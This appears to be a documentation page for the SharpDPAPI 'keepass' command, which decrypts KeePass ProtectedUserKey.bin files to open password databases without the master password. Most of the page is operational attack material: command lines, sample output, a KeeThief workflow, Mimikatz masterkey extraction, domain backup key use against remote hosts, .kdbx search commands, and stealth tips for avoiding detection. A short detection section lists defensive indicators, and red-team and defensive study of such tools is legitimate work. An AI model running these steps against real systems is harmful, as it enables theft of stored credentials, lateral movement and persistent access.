Skip to main content

Overview

The keepass command searches for and decrypts KeePass ProtectedUserKey.bin files. These files contain DPAPI-protected key material used by KeePass to encrypt password databases, providing access to potentially hundreds of stored credentials.
KeePass can use Windows DPAPI to protect its master key file. Decrypting this file allows you to open KeePass databases without knowing the master password.

Basic Usage

# Decrypt with CryptUnprotectData (unprivileged)
SharpDPAPI.exe keepass /unprotect

# Decrypt with domain backup key
SharpDPAPI.exe keepass /pvk:key.pvk

# Decrypt with masterkey mappings
SharpDPAPI.exe keepass {GUID1}:SHA1 {GUID2}:SHA1

# Target specific ProtectedUserKey.bin file
SharpDPAPI.exe keepass /target:C:\Path\To\ProtectedUserKey.bin /unprotect

Command Arguments

Decryption Methods

  • CryptUnprotectData
  • Domain Backup Key
  • Masterkey Mappings
  • User Credentials
# Use Windows API for decryption (unprivileged)
SharpDPAPI.exe keepass /unprotect
This method works without needing masterkeys if run from the user context who created the protected key file. No LSASS access required!

Targeting Options

ArgumentDescription
/target:FILETarget specific ProtectedUserKey.bin file
/target:FOLDERTarget folder containing KeePass key files
/server:SERVERTriage remote server (requires admin access + pvk/password)
When using /target with a file, you must provide either /unprotect or :SHA1 masterkey mappings. When using /target with a folder, the folder must contain DPAPI masterkeys if using /pvk.

Execution Context

  • Elevated
  • Unelevated
When run with administrative privileges:
  • Triages all users on the system
  • Searches all user profiles for KeePass key files
  • Maximum key recovery

Example: Using /unprotect

SharpDPAPI.exe keepass /unprotect
Output: 
[*] Action: KeePass Triage

[*] Using CryptUnprotectData() for decryption.

[*] Triaging KeePass ProtectedUserKey.bin files for current user

    File             : C:\Users\harmj0y\AppData\Roaming\KeePass\ProtectedUserKey.bin
    Accessed         : 3/1/2021 1:38:22 PM
    Modified         : 1/4/2021 5:49:49 PM
    guidMasterKey    : {dab90445-0a08-4b27-9110-b75d4a7894d0}
    size             : 210
    flags            : 0x0
    algHash/algCrypt : 32772 (CALG_SHA) / 26115 (CALG_3DES)
    description      :
    Key Bytes        : 39 2E 63 EF 0E 37 E8 5C 34 ...


SharpDPAPI completed in 00:00:00.0566660
Save the Key Bytes output - these can be used with the modified KeePass version from KeeThief to open password databases.

Using Decrypted Key Bytes

Once you have the decrypted key bytes, you can use them to open KeePass databases:
1

Obtain Decrypted Key

SharpDPAPI.exe keepass /unprotect
# Save the "Key Bytes" output
2

Get Modified KeePass

Download the modified KeePass from KeeThiefThis version accepts raw key bytes instead of a master password
3

Open Database

Use the decrypted key bytes with the modified KeePass to open the user’s password database without knowing their master password

KeePass Protected Key File Location

Default Location: 
%APPDATA%\KeePass\ProtectedUserKey.bin
Alternative Locations:
  • Custom KeePass configuration directories
  • Portable KeePass installations
  • Network/shared KeePass configurations

How KeePass DPAPI Protection Works

1

User Enables Protection

KeePass offers “User account” protection option which uses Windows DPAPI
2

Key Material Encryption

KeePass encrypts the master key material with user’s DPAPI masterkey
3

Protected Key Saved

Encrypted key saved to ProtectedUserKey.bin in KeePass profile
4

Automatic Unlock

When KeePass runs, it uses CryptUnprotectData() to automatically decrypt the key
This protection binds the KeePass database to the Windows user account. If the user logs in, KeePass can open automatically without prompting for a password.

Common Scenarios

After obtaining domain admin and backup key:
# 1. Retrieve backup key
SharpDPAPI.exe backupkey /file:key.pvk

# 2. Decrypt KeePass keys locally
SharpDPAPI.exe keepass /pvk:key.pvk

# 3. Decrypt on remote systems
SharpDPAPI.exe keepass /pvk:key.pvk /server:admin-workstation.domain.com
Extract masterkeys and decrypt KeePass key files:
# 1. In Mimikatz
# mimikatz# privilege::debug
# mimikatz# sekurlsa::dpapi

# 2. Run SharpDPAPI with extracted masterkeys
SharpDPAPI.exe keepass {dab90445-0a08-4b27-9110-b75d4a7894d0}:C23AF7432EB513717AA...
Analyzing copied KeePass configuration:
# Target specific file with backup key
SharpDPAPI.exe keepass /target:C:\Evidence\ProtectedUserKey.bin /pvk:key.pvk

# With masterkey mappings
SharpDPAPI.exe keepass /target:C:\Evidence\ProtectedUserKey.bin {GUID}:SHA1

Finding KeePass Databases

After decrypting the protected key, locate the KeePass databases: Common Locations: 
%USERPROFILE%\Documents\*.kdbx
%USERPROFILE%\Desktop\*.kdbx
%USERPROFILE%\KeePass\*.kdbx
Network shares
Cloud storage (OneDrive, Dropbox, etc.)
Search for databases: 
# PowerShell
Get-ChildItem -Path C:\Users\ -Recurse -Filter *.kdbx -ErrorAction SilentlyContinue

# CMD
dir C:\Users\*.kdbx /s

Detection Considerations

Host-Based Indicators:
  • Reading ProtectedUserKey.bin file
  • Non-KeePass processes accessing KeePass configuration
  • Enumeration of KeePass directories
  • Access to .kdbx database files
Defensive Monitoring:
  • Monitor access to %APPDATA%\KeePass\ProtectedUserKey.bin
  • Alert on ProtectedUserKey.bin access by non-KeePass processes
  • Track .kdbx file access patterns
  • Detect bulk KeePass configuration enumeration
  • Monitor for LSASS access (when not using /unprotect)
Event Log Indicators: 
Event ID: 4663 (File Access)
Object Name: *\KeePass\ProtectedUserKey.bin
Object Name: *.kdbx
Process Name: Not KeePass.exe

Why Target KeePass?

Credential Jackpot

Password managers contain hundreds or thousands of credentials

High-Value Targets

Often contains admin, service account, and critical system passwords

Lateral Movement

Provides credentials for multiple systems and services

Persistent Access

Credentials remain valid even after user password changes

triage

Comprehensive user DPAPI triage

credentials

Decrypt Credential Manager files

masterkeys

Decrypt user masterkeys

backupkey

Retrieve domain backup key

Tips

  • Prefer /unprotect when running as the target user
  • Look for KeePass on administrator and privileged user workstations
  • After decrypting key, search entire system for .kdbx files
  • Check network shares and cloud storage for KeePass databases
  • Combine with file search to locate all password databases
  • Use /unprotect for minimal detection footprint
  • Run without elevation when possible
  • Target specific files if locations are known
  • Redirect output to file with /consoleoutfile
  • Avoid bulk enumeration if stealth is required
No KeePass files found:
  • User may not use KeePass protection feature
  • KeePass may use master password instead of Windows protection
  • Check for portable KeePass installations
  • Look in non-standard configuration directories
Decryption fails with /unprotect:
  • Must run from the user context who created the protected key
  • Try using masterkeys or backup key instead
  • Verify you’re running as the correct user
  • File may be corrupted or invalid format
Can’t find KeePass database:
  • Search entire file system for .kdbx files
  • Check network shares and mapped drives
  • Look in cloud storage sync folders
  • User may keep database on removable media

Additional Resources

KeeThief Project

Modified KeePass version and additional tools for KeePass credential extraction